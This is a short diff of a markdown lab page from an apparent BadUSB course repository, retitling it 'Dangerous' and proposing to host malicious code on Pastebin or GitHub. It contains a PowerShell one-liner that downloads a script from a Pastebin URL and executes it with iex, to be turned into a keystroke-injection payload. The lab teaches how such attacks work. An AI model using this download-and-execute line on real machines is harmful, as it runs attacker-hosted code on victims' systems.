kenvb/badusb/docs/dangerouscode.md

 ---
 layout: default
-title: Encore!(2)
+title: Dangerous
 nav_order: 50
 ---

-In our labs, we sent data to pastebin.
-But what if we used pastebin (or github) to host our malicious code?!
+In our labs, we sent data to Pastebin/Github.
+But what if we used those platforms to host our malicious code?!
 Duckify this powershell command:
 ```powershell
 iex((iwr http://pastebin.com/raw.php?i=sWacjDpa).content)